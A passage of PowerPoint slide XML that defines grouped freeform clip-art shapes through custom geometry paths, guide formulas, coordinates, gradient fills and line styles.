                        <a:moveTo>
                          <a:pt x="671" y="753"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="671" y="160"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="578"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="671" y="753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B2B2B2"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="E5E5E5"/>
                      </a:gs>
                    </a:gsLst>
                    <a:path path="rect">
                      <a:fillToRect l="100000" t="100000"/>
                    </a:path>
                  </a:gradFill>
                  <a:ln w="3175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7" name="Freeform 49"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="2715" y="947"/>
                    <a:ext cx="425" cy="464"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 490 w 491"/>
                      <a:gd name="T1" fmla="*/ 548 h 549"/>
                      <a:gd name="T2" fmla="*/ 490 w 491"/>
                      <a:gd name="T3" fmla="*/ 117 h 549"/>
                      <a:gd name="T4" fmla="*/ 0 w 491"/>
                      <a:gd name="T5" fmla="*/ 0 h 549"/>
                      <a:gd name="T6" fmla="*/ 0 w 491"/>
                      <a:gd name="T7" fmla="*/ 424 h 549"/>
                      <a:gd name="T8" fmla="*/ 490 w 491"/>
                      <a:gd name="T9" fmla="*/ 548 h 54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91"/>
                      <a:gd name="T16" fmla="*/ 0 h 549"/>
                      <a:gd name="T17" fmla="*/ 491 w 491"/>
                      <a:gd name="T18" fmla="*/ 549 h 54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91" h="549">
                        <a:moveTo>
                          <a:pt x="490" y="548"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="490" y="117"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="424"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="490" y="548"/>
                        </a:lnTo>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="CECECE"/>
                  </a:solidFill>
                  <a:ln w="6350" cap="rnd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8" name="Freeform 50"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="2741" y="978"/>
                    <a:ext cx="372" cy="4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0" y="454"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="542" y="592"/>
                      </a:cxn>
                      <a:cxn ang="0">
                        <a:pos x="542" y="130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542" h="592">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="454"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="542" y="592"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="542" y="13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0">
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:srgbClr val="618FFD"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="618FFD">
                          <a:gamma/>
                          <a:shade val="75294"/>
                          <a:invGamma/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:path path="rect">
                      <a:fillToRect r="100000" b="100000"/>
                    </a:path>
                  </a:gradFill>
                  <a:ln w="6350" cap="flat" cmpd="sng">
                    <a:solidFill>
                      <a:srgbClr val="777777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dist="17961" dir="2700000" algn="ctr" rotWithShape="0">
                      <a:schemeClr val="bg1"/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49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2774" y="1011"/>
                    <a:ext cx="0" cy="61"/>
                  </a:xfrm>
                  <a:prstGeom prst="line">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:noFill/>
                  <a:ln w="2540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</p:grpSp>
          </p:grpSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="28" name="Group 52"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="506" y="646"/>
                <a:ext cx="1094" cy="1412"/>
                <a:chOff x="2274" y="2835"/>
                <a:chExt cx="932" cy="1202"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29" name="Freeform 53"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2656" y="3027"/>
                  <a:ext cx="282" cy="298"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 354 w 385"/>
                    <a:gd name="T1" fmla="*/ 24 h 405"/>
                    <a:gd name="T2" fmla="*/ 358 w 385"/>
                    <a:gd name="T3" fmla="*/ 46 h 405"/>
                    <a:gd name="T4" fmla="*/ 358 w 385"/>
                    <a:gd name="T5" fmla="*/ 66 h 405"/>
                    <a:gd name="T6" fmla="*/ 357 w 385"/>
                    <a:gd name="T7" fmla="*/ 93 h 405"/>
                    <a:gd name="T8" fmla="*/ 369 w 385"/>
                    <a:gd name="T9" fmla="*/ 112 h 405"/>
                    <a:gd name="T10" fmla="*/ 378 w 385"/>
                    <a:gd name="T11" fmla="*/ 127 h 405"/>
                    <a:gd name="T12" fmla="*/ 384 w 385"/>
                    <a:gd name="T13" fmla="*/ 141 h 405"/>
                    <a:gd name="T14" fmla="*/ 378 w 385"/>
                    <a:gd name="T15" fmla="*/ 151 h 405"/>
                    <a:gd name="T16" fmla="*/ 372 w 385"/>
                    <a:gd name="T17" fmla="*/ 156 h 405"/>
                    <a:gd name="T18" fmla="*/ 357 w 385"/>
                    <a:gd name="T19" fmla="*/ 162 h 405"/>
                    <a:gd name="T20" fmla="*/ 345 w 385"/>
                    <a:gd name="T21" fmla="*/ 169 h 405"/>
                    <a:gd name="T22" fmla="*/ 343 w 385"/>
                    <a:gd name="T23" fmla="*/ 175 h 405"/>
                    <a:gd name="T24" fmla="*/ 340 w 385"/>
                    <a:gd name="T25" fmla="*/ 192 h 405"/>
                    <a:gd name="T26" fmla="*/ 343 w 385"/>
                    <a:gd name="T27" fmla="*/ 204 h 405"/>
                    <a:gd name="T28" fmla="*/ 334 w 385"/>
                    <a:gd name="T29" fmla="*/ 213 h 405"/>
                    <a:gd name="T30" fmla="*/ 325 w 385"/>
                    <a:gd name="T31" fmla="*/ 217 h 405"/>
                    <a:gd name="T32" fmla="*/ 322 w 385"/>
                    <a:gd name="T33" fmla="*/ 222 h 405"/>
                    <a:gd name="T34" fmla="*/ 324 w 385"/>
                    <a:gd name="T35" fmla="*/ 230 h 405"/>
                    <a:gd name="T36" fmla="*/ 322 w 385"/>
                    <a:gd name="T37" fmla="*/ 238 h 405"/>
                    <a:gd name="T38" fmla="*/ 314 w 385"/>
                    <a:gd name="T39" fmla="*/ 246 h 405"/>
                    <a:gd name="T40" fmla="*/ 302 w 385"/>
                    <a:gd name="T41" fmla="*/ 254 h 405"/>
                    <a:gd name="T42" fmla="*/ 300 w 385"/>
                    <a:gd name="T43" fmla="*/ 266 h 405"/>
                    <a:gd name="T44" fmla="*/ 300 w 385"/>
                    <a:gd name="T45" fmla="*/ 280 h 405"/>
                    <a:gd name="T46" fmla="*/ 296 w 385"/>
                    <a:gd name="T47" fmla="*/ 294 h 405"/>
                    <a:gd name="T48" fmla="*/ 288 w 385"/>
                    <a:gd name="T49" fmla="*/ 304 h 405"/>
                    <a:gd name="T50" fmla="*/ 272 w 385"/>
                    <a:gd name="T51" fmla="*/ 310 h 405"/>
                    <a:gd name="T52" fmla="*/ 254 w 385"/>
                    <a:gd name="T53" fmla="*/ 304 h 405"/>
                    <a:gd name="T54" fmla="*/ 226 w 385"/>
                    <a:gd name="T55" fmla="*/ 298 h 405"/>
                    <a:gd name="T56" fmla="*/ 206 w 385"/>
                    <a:gd name="T57" fmla="*/ 290 h 405"/>
                    <a:gd name="T58" fmla="*/ 188 w 385"/>
                    <a:gd name="T59" fmla="*/ 286 h 405"/>
                    <a:gd name="T60" fmla="*/ 174 w 385"/>
                    <a:gd name="T61" fmla="*/ 294 h 405"/>
                    <a:gd name="T62" fmla="*/ 158 w 385"/>
                    <a:gd name="T63" fmla="*/ 314 h 405"/>
                    <a:gd name="T64" fmla="*/ 148 w 385"/>
                    <a:gd name="T65" fmla="*/ 334 h 405"/>
                    <a:gd name="T66" fmla="*/ 134 w 385"/>
                    <a:gd name="T67" fmla="*/ 356 h 405"/>
                    <a:gd name="T68" fmla="*/ 126 w 385"/>
                    <a:gd name="T69" fmla="*/ 374 h 405"/>
                    <a:gd name="T70" fmla="*/ 118 w 385"/>
                    <a:gd name="T71" fmla="*/ 390 h 405"/>
                    <a:gd name="T72" fmla="*/ 110 w 385"/>
                    <a:gd name="T73" fmla="*/ 404 h 405"/>
                    <a:gd name="T74" fmla="*/ 96 w 385"/>
                    <a:gd name="T75" fmla="*/ 380 h 405"/>
                    <a:gd name="T76" fmla="*/ 86 w 385"/>
                    <a:gd name="T77" fmla="*/ 366 h 405"/>
                    <a:gd name="T78" fmla="*/ 72 w 385"/>
                    <a:gd name="T79" fmla="*/ 350 h 405"/>
                    <a:gd name="T80" fmla="*/ 62 w 385"/>
                    <a:gd name="T81" fmla="*/ 326 h 405"/>
                    <a:gd name="T82" fmla="*/ 0 w 385"/>
                    <a:gd name="T83" fmla="*/ 218 h 405"/>
                    <a:gd name="T84" fmla="*/ 20 w 385"/>
                    <a:gd name="T85" fmla="*/ 182 h 405"/>
                    <a:gd name="T86" fmla="*/ 264 w 385"/>
                    <a:gd name="T87" fmla="*/ 0 h 405"/>
                    <a:gd name="T88" fmla="*/ 354 w 385"/>
                    <a:gd name="T89" fmla="*/ 24 h 405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385"/>
                    <a:gd name="T136" fmla="*/ 0 h 405"/>
                    <a:gd name="T137" fmla="*/ 385 w 385"/>
                    <a:gd name="T138" fmla="*/ 405 h 405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385" h="405">
                      <a:moveTo>
                        <a:pt x="354" y="24"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="358" y="46"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="358" y="66"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="357" y="93"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="369" y="112"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="378" y="127"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="384" y="141"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="378" y="151"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="372" y="156"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="357" y="162"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="345" y="169"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="343" y="175"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="340" y="192"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="343" y="204"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="334" y="213"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="325" y="217"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="322" y="222"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="324" y="230"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="322" y="238"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="314" y="246"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="302" y="254"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="300" y="266"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="300" y="280"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="296" y="294"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="288" y="304"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="272" y="310"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="254" y="304"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="226" y="298"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="206" y="290"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="188" y="286"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="174" y="294"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="158" y="314"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="148" y="334"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="134" y="356"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="126" y="374"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="118" y="390"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="110" y="404"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="96" y="380"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="86" y="366"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="72" y="350"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="62" y="326"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="218"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="20" y="182"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="264" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="354" y="24"/>
                      </a:lnTo>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="B2B2B2"/>
                </a:solidFill>
                <a:ln w="9525" cap="rnd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30" name="Freeform 54"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2563" y="2835"/>
                  <a:ext cx="390" cy="361"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 481 w 529"/>
                    <a:gd name="T1" fmla="*/ 305 h 491"/>
                    <a:gd name="T2" fmla="*/ 503 w 529"/>
                    <a:gd name="T3" fmla="*/ 281 h 491"/>
                    <a:gd name="T4" fmla="*/ 517 w 529"/>
                    <a:gd name="T5" fmla="*/ 261 h 491"/>
                    <a:gd name="T6" fmla="*/ 526 w 529"/>
                    <a:gd name="T7" fmla="*/ 237 h 491"/>
                    <a:gd name="T8" fmla="*/ 528 w 529"/>
                    <a:gd name="T9" fmla="*/ 203 h 491"/>
                    <a:gd name="T10" fmla="*/ 526 w 529"/>
                    <a:gd name="T11" fmla="*/ 185 h 491"/>
                    <a:gd name="T12" fmla="*/ 519 w 529"/>
                    <a:gd name="T13" fmla="*/ 157 h 491"/>
                    <a:gd name="T14" fmla="*/ 508 w 529"/>
                    <a:gd name="T15" fmla="*/ 126 h 491"/>
                    <a:gd name="T16" fmla="*/ 483 w 529"/>
                    <a:gd name="T17" fmla="*/ 91 h 491"/>
                    <a:gd name="T18" fmla="*/ 457 w 529"/>
                    <a:gd name="T19" fmla="*/ 59 h 491"/>
                    <a:gd name="T20" fmla="*/ 419 w 529"/>
                    <a:gd name="T21" fmla="*/ 33 h 491"/>
                    <a:gd name="T22" fmla="*/ 399 w 529"/>
                    <a:gd name="T23" fmla="*/ 20 h 491"/>
                    <a:gd name="T24" fmla="*/ 365 w 529"/>
                    <a:gd name="T25" fmla="*/ 7 h 491"/>
                    <a:gd name="T26" fmla="*/ 330 w 529"/>
                    <a:gd name="T27" fmla="*/ 0 h 491"/>
                    <a:gd name="T28" fmla="*/ 287 w 529"/>
                    <a:gd name="T29" fmla="*/ 2 h 491"/>
                    <a:gd name="T30" fmla="*/ 234 w 529"/>
                    <a:gd name="T31" fmla="*/ 7 h 491"/>
                    <a:gd name="T32" fmla="*/ 183 w 529"/>
                    <a:gd name="T33" fmla="*/ 22 h 491"/>
                    <a:gd name="T34" fmla="*/ 125 w 529"/>
                    <a:gd name="T35" fmla="*/ 61 h 491"/>
                    <a:gd name="T36" fmla="*/ 87 w 529"/>
                    <a:gd name="T37" fmla="*/ 111 h 491"/>
                    <a:gd name="T38" fmla="*/ 62 w 529"/>
                    <a:gd name="T39" fmla="*/ 148 h 491"/>
                    <a:gd name="T40" fmla="*/ 45 w 529"/>
                    <a:gd name="T41" fmla="*/ 179 h 491"/>
                    <a:gd name="T42" fmla="*/ 31 w 529"/>
                    <a:gd name="T43" fmla="*/ 242 h 491"/>
                    <a:gd name="T44" fmla="*/ 22 w 529"/>
                    <a:gd name="T45" fmla="*/ 303 h 491"/>
                    <a:gd name="T46" fmla="*/ 9 w 529"/>
                    <a:gd name="T47" fmla="*/ 333 h 491"/>
                    <a:gd name="T48" fmla="*/ 0 w 529"/>
                    <a:gd name="T49" fmla="*/ 366 h 491"/>
                    <a:gd name="T50" fmla="*/ 9 w 529"/>
                    <a:gd name="T51" fmla="*/ 401 h 491"/>
                    <a:gd name="T52" fmla="*/ 40 w 529"/>
                    <a:gd name="T53" fmla="*/ 433 h 491"/>
                    <a:gd name="T54" fmla="*/ 96 w 529"/>
                    <a:gd name="T55" fmla="*/ 457 h 491"/>
                    <a:gd name="T56" fmla="*/ 216 w 529"/>
                    <a:gd name="T57" fmla="*/ 481 h 491"/>
                    <a:gd name="T58" fmla="*/ 307 w 529"/>
                    <a:gd name="T59" fmla="*/ 486 h 491"/>
                    <a:gd name="T60" fmla="*/ 332 w 529"/>
                    <a:gd name="T61" fmla="*/ 468 h 491"/>
                    <a:gd name="T62" fmla="*/ 345 w 529"/>
                    <a:gd name="T63" fmla="*/ 468 h 491"/>
                    <a:gd name="T64" fmla="*/ 340 w 529"/>
                    <a:gd name="T65" fmla="*/ 490 h 491"/>
                    <a:gd name="T66" fmla="*/ 380 w 529"/>
                    <a:gd name="T67" fmla="*/ 488 h 491"/>
                    <a:gd name="T68" fmla="*/ 414 w 529"/>
                    <a:gd name="T69" fmla="*/ 478 h 491"/>
                    <a:gd name="T70" fmla="*/ 374 w 529"/>
                    <a:gd name="T71" fmla="*/ 440 h 491"/>
                    <a:gd name="T72" fmla="*/ 356 w 529"/>
                    <a:gd name="T73" fmla="*/ 406 h 491"/>
                    <a:gd name="T74" fmla="*/ 356 w 529"/>
                    <a:gd name="T75" fmla="*/ 358 h 491"/>
                    <a:gd name="T76" fmla="*/ 372 w 529"/>
                    <a:gd name="T77" fmla="*/ 314 h 491"/>
                    <a:gd name="T78" fmla="*/ 388 w 529"/>
                    <a:gd name="T79" fmla="*/ 297 h 491"/>
                    <a:gd name="T80" fmla="*/ 438 w 529"/>
                    <a:gd name="T81" fmla="*/ 299 h 491"/>
                    <a:gd name="T82" fmla="*/ 481 w 529"/>
                    <a:gd name="T83" fmla="*/ 305 h 49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29"/>
                    <a:gd name="T127" fmla="*/ 0 h 491"/>
                    <a:gd name="T128" fmla="*/ 529 w 529"/>
                    <a:gd name="T129" fmla="*/ 491 h 491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29" h="491">
                      <a:moveTo>
                        <a:pt x="481" y="305"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="503" y="281"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="517" y="261"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="526" y="237"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="528" y="203"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="526" y="185"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="519" y="157"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="508" y="126"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="483" y="91"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="457" y="59"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="419" y="33"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="399" y="20"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="365" y="7"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="330" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="287" y="2"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="234" y="7"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="183" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="125" y="61"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="87" y="111"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="62" y="148"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="45" y="179"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="31" y="242"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="22" y="303"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9" y="333"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="366"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9" y="401"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="40" y="433"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="96" y="457"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="216" y="481"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="307" y="486"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="332" y="468"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="345" y="468"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="340" y="490"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="380" y="488"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="414" y="478"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="374" y="440"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="356" y="406"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="356" y="358"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="372" y="314"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="388" y="297"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="438" y="299"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="481" y="305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31" name="Freeform 55"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2864" y="3086"/>
                  <a:ext cx="30" cy="11"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 41"/>
                    <a:gd name="T1" fmla="*/ 0 h 15"/>
                    <a:gd name="T2" fmla="*/ 40 w 41"/>
                    <a:gd name="T3" fmla="*/ 6 h 15"/>
                    <a:gd name="T4" fmla="*/ 34 w 41"/>
                    <a:gd name="T5" fmla="*/ 14 h 15"/>
                    <a:gd name="T6" fmla="*/ 0 w 41"/>
                    <a:gd name="T7" fmla="*/ 0 h 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1"/>
                    <a:gd name="T13" fmla="*/ 0 h 15"/>
                    <a:gd name="T14" fmla="*/ 41 w 41"/>
                    <a:gd name="T15" fmla="*/ 15 h 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1" h="15">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="40" y="6"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="34" y="1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9525" cap="rnd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32" name="Freeform 56"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2798" y="3862"/>
                  <a:ext cx="408" cy="139"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 455 w 556"/>
                    <a:gd name="T1" fmla="*/ 32 h 190"/>
                    <a:gd name="T2" fmla="*/ 468 w 556"/>
                    <a:gd name="T3" fmla="*/ 46 h 190"/>
                    <a:gd name="T4" fmla="*/ 487 w 556"/>
                    <a:gd name="T5" fmla="*/ 65 h 190"/>
                    <a:gd name="T6" fmla="*/ 498 w 556"/>
                    <a:gd name="T7" fmla="*/ 74 h 190"/>
                    <a:gd name="T8" fmla="*/ 504 w 556"/>
                    <a:gd name="T9" fmla="*/ 90 h 190"/>
                    <a:gd name="T10" fmla="*/ 517 w 556"/>
                    <a:gd name="T11" fmla="*/ 104 h 190"/>
                    <a:gd name="T12" fmla="*/ 527 w 556"/>
                    <a:gd name="T13" fmla="*/ 112 h 190"/>
                    <a:gd name="T14" fmla="*/ 539 w 556"/>
                    <a:gd name="T15" fmla="*/ 116 h 190"/>
                    <a:gd name="T16" fmla="*/ 555 w 556"/>
                    <a:gd name="T17" fmla="*/ 124 h 190"/>
                    <a:gd name="T18" fmla="*/ 553 w 556"/>
                    <a:gd name="T19" fmla="*/ 138 h 190"/>
                    <a:gd name="T20" fmla="*/ 543 w 556"/>
                    <a:gd name="T21" fmla="*/ 144 h 190"/>
                    <a:gd name="T22" fmla="*/ 527 w 556"/>
                    <a:gd name="T23" fmla="*/ 146 h 190"/>
                    <a:gd name="T24" fmla="*/ 513 w 556"/>
                    <a:gd name="T25" fmla="*/ 138 h 190"/>
                    <a:gd name="T26" fmla="*/ 489 w 556"/>
                    <a:gd name="T27" fmla="*/ 130 h 190"/>
                    <a:gd name="T28" fmla="*/ 463 w 556"/>
                    <a:gd name="T29" fmla="*/ 130 h 190"/>
                    <a:gd name="T30" fmla="*/ 452 w 556"/>
                    <a:gd name="T31" fmla="*/ 129 h 190"/>
                    <a:gd name="T32" fmla="*/ 428 w 556"/>
                    <a:gd name="T33" fmla="*/ 135 h 190"/>
                    <a:gd name="T34" fmla="*/ 392 w 556"/>
                    <a:gd name="T35" fmla="*/ 158 h 190"/>
                    <a:gd name="T36" fmla="*/ 359 w 556"/>
                    <a:gd name="T37" fmla="*/ 178 h 190"/>
                    <a:gd name="T38" fmla="*/ 325 w 556"/>
                    <a:gd name="T39" fmla="*/ 185 h 190"/>
                    <a:gd name="T40" fmla="*/ 284 w 556"/>
                    <a:gd name="T41" fmla="*/ 189 h 190"/>
                    <a:gd name="T42" fmla="*/ 249 w 556"/>
                    <a:gd name="T43" fmla="*/ 185 h 190"/>
                    <a:gd name="T44" fmla="*/ 210 w 556"/>
                    <a:gd name="T45" fmla="*/ 182 h 190"/>
                    <a:gd name="T46" fmla="*/ 178 w 556"/>
                    <a:gd name="T47" fmla="*/ 176 h 190"/>
                    <a:gd name="T48" fmla="*/ 134 w 556"/>
                    <a:gd name="T49" fmla="*/ 169 h 190"/>
                    <a:gd name="T50" fmla="*/ 82 w 556"/>
                    <a:gd name="T51" fmla="*/ 156 h 190"/>
                    <a:gd name="T52" fmla="*/ 30 w 556"/>
                    <a:gd name="T53" fmla="*/ 139 h 190"/>
                    <a:gd name="T54" fmla="*/ 8 w 556"/>
                    <a:gd name="T55" fmla="*/ 124 h 190"/>
                    <a:gd name="T56" fmla="*/ 0 w 556"/>
                    <a:gd name="T57" fmla="*/ 122 h 190"/>
                    <a:gd name="T58" fmla="*/ 35 w 556"/>
                    <a:gd name="T59" fmla="*/ 90 h 190"/>
                    <a:gd name="T60" fmla="*/ 68 w 556"/>
                    <a:gd name="T61" fmla="*/ 49 h 190"/>
                    <a:gd name="T62" fmla="*/ 72 w 556"/>
                    <a:gd name="T63" fmla="*/ 29 h 190"/>
                    <a:gd name="T64" fmla="*/ 129 w 556"/>
                    <a:gd name="T65" fmla="*/ 53 h 190"/>
                    <a:gd name="T66" fmla="*/ 180 w 556"/>
                    <a:gd name="T67" fmla="*/ 74 h 190"/>
                    <a:gd name="T68" fmla="*/ 236 w 556"/>
                    <a:gd name="T69" fmla="*/ 93 h 190"/>
                    <a:gd name="T70" fmla="*/ 273 w 556"/>
                    <a:gd name="T71" fmla="*/ 99 h 190"/>
                    <a:gd name="T72" fmla="*/ 296 w 556"/>
                    <a:gd name="T73" fmla="*/ 72 h 190"/>
                    <a:gd name="T74" fmla="*/ 323 w 556"/>
                    <a:gd name="T75" fmla="*/ 48 h 190"/>
                    <a:gd name="T76" fmla="*/ 347 w 556"/>
                    <a:gd name="T77" fmla="*/ 27 h 190"/>
                    <a:gd name="T78" fmla="*/ 368 w 556"/>
                    <a:gd name="T79" fmla="*/ 7 h 190"/>
                    <a:gd name="T80" fmla="*/ 398 w 556"/>
                    <a:gd name="T81" fmla="*/ 0 h 190"/>
                    <a:gd name="T82" fmla="*/ 409 w 556"/>
                    <a:gd name="T83" fmla="*/ 6 h 190"/>
                    <a:gd name="T84" fmla="*/ 421 w 556"/>
                    <a:gd name="T85" fmla="*/ 18 h 190"/>
                    <a:gd name="T86" fmla="*/ 438 w 556"/>
                    <a:gd name="T87" fmla="*/ 24 h 190"/>
                    <a:gd name="T88" fmla="*/ 455 w 556"/>
                    <a:gd name="T89" fmla="*/ 32 h 19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556"/>
                    <a:gd name="T136" fmla="*/ 0 h 190"/>
                    <a:gd name="T137" fmla="*/ 556 w 556"/>
                    <a:gd name="T138" fmla="*/ 190 h 190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556" h="190">
                      <a:moveTo>
                        <a:pt x="455" y="32"/>
                      </a:moveTo>
